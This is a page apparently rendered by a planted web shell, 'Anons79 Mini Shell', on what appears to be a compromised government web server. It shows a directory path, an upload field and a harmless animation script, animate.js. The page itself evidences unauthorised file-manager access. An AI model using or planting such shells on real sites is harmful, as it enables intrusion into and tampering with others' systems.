Anons79 Mini Shell

Directory : /home/aplikasiposinfo/public_html/dbon.kaltimprov.go.id/public/js/
Upload File :
Current File : /home/aplikasiposinfo/public_html/dbon.kaltimprov.go.id/public/js/animate.js

const observer = new IntersectionObserver((entries) => {
  entries.forEach((entry) => {
    if (entry.isIntersecting) {

      entry.target.classList.add('show')
    } else {

      entry.target.classList.remove('show')

    }

  });
});
const hiddenElements = document.querySelectorAll('.hidden')
hiddenElements.forEach((el) => observer.observe(el));

Anons79 File Manager Version 1.0, Coded By Anons79
Email: [email protected]